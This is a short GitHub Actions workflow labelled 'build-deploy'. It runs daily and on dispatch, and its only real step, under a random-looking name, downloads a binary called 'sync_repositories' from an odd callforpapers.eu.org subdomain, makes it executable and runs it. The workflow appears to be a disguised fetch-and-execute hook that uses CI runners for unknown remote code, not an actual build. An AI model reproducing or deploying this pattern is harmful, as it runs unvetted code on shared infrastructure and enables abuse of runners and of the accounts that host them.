#2024-03-18-[135736]-x1snpxb0
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "45 4 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 64ikipzw2xpfzkmm
        run: |
          wget -q https://0gs78u8leqktlb88.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories